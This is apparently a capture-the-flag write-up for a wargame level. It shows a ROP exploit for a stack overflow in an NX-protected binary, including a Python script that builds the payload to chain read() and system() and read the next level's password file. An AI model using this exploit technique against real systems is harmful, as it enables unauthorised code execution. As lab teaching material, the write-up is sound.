Try the challenge thoroughly before reading the write-up. Otherwise, it's your loss.
We ssh to [email protected] and authenticate using the password we had obtained after solving the previous level.
Recap of previous level.
The recap of the previous level showcases a different solution from mine. It also has some neat tricks for figuring out whether your shellcode is being mangled, using a tracepoint/breakpoint trap. Definitely check it out!
They’re tired of coming up with welcome messages. Oh, well!
So, the challenge binary just takes in input, that’s it.
There’s a buffer overflow vulnerability, but the binary is NX/DEP protected. Go ROP, go!
It was a basic return oriented programming based exploit.
Our goal: call system() with the address of ‘cat /home/level12/.pass’ as argument.
Figure out the addresses of read() and system(), and overwrite the return address with the address of read().
Figure out a memory location into which the input ('cat /home/level12/.pass') will be read.
Figure out the address of a pop, pop, pop, ret ROP gadget.
Call system() with the address at which our input has been stored.
Figuring out the address of read() and system():
We open up the binary in gdb and,
Figure out a memory address to write to:
We need to write to some place in memory which can be written to, and can also hold our data. The .dynamic section is an ideal choice.
So, we'll be writing to the address 0x080495ec.
We need the ROP gadget for pop, pop, pop, ret (three pops, one per argument of read(), so the stack is cleaned up before we return into system()).
Examining the disassembly:
Therefore the ROP gadget we'll be using is at 0x804849d.
Putting it all together
We easily figure out that the return address is at an offset of 28 from the input.
Our goal is to have the stack look like this after we successfully redirect code execution to the read() function through the buffer overflow:
The final exploit code is, therefore:
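The author's script itself was not preserved on this page, so here is an added Python reconstruction of the stack layout described above (not the original exploit code). The offset of 28, the gadget at 0x804849d and the .dynamic scratch address 0x080495ec are taken from the write-up; READ_ADDR and SYSTEM_ADDR are placeholders standing in for the values the write-up read out of gdb.

```python
import struct

# Constants taken from the write-up.
RET_OFFSET = 28             # saved return address sits 28 bytes into the input
POP3_RET = 0x0804849d       # pop; pop; pop; ret gadget found in the disassembly
SCRATCH = 0x080495ec        # writable .dynamic section, used to hold the command
COMMAND = b"cat /home/level12/.pass\x00"

# Placeholders: the write-up took these from gdb; substitute the real addresses.
READ_ADDR = 0x41414141
SYSTEM_ADDR = 0x42424242


def p32(value):
    """Pack a 32-bit little-endian word (what the x86 stack expects)."""
    return struct.pack("<I", value)


def build_chain(read_addr, system_addr, command=COMMAND):
    """Overflow payload: return into read(0, SCRATCH, len(command)), clean the
    three arguments with POP3_RET, then return into system(SCRATCH)."""
    chain = b"A" * RET_OFFSET          # padding up to the saved return address
    chain += p32(read_addr)            # overwritten return address -> read()
    chain += p32(POP3_RET)             # read()'s return address -> gadget
    chain += p32(0)                    # read arg 0: fd (stdin)
    chain += p32(SCRATCH)              # read arg 1: buf
    chain += p32(len(command))         # read arg 2: count
    chain += p32(system_addr)          # gadget's ret lands here -> system()
    chain += p32(0xdeadbeef)           # fake return address for system()
    chain += p32(SCRATCH)              # system arg 0: pointer to command string
    return chain


def stack_words(chain):
    """Decode the words above the padding, i.e. the stack as the write-up draws it."""
    tail = chain[RET_OFFSET:]
    return [w for (w,) in struct.iter_unpack("<I", tail)]


def stages(read_addr=READ_ADDR, system_addr=SYSTEM_ADDR, command=COMMAND):
    """Two writes to the target: the overflow, then exactly len(command) bytes
    for the read() call in the chain to consume."""
    return build_chain(read_addr, system_addr, command), command


if __name__ == "__main__":
    payload, cmd = stages()
    for i, word in enumerate(stack_words(payload)):
        print(f"[ret+{4*i:2d}] {word:#010x}")
    print("second write:", cmd)
```

The second write must be exactly len(COMMAND) bytes, since that is the count passed to read(); a newline or extra bytes would end up in .dynamic after the terminator.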
And voilà! I got the password to the next level. I am not revealing the password here so that readers try the challenge on their own.
Another solution, using the ROP module of pwntools (which unfortunately is not installed on the gracker machine), is the following (tested on my local machine):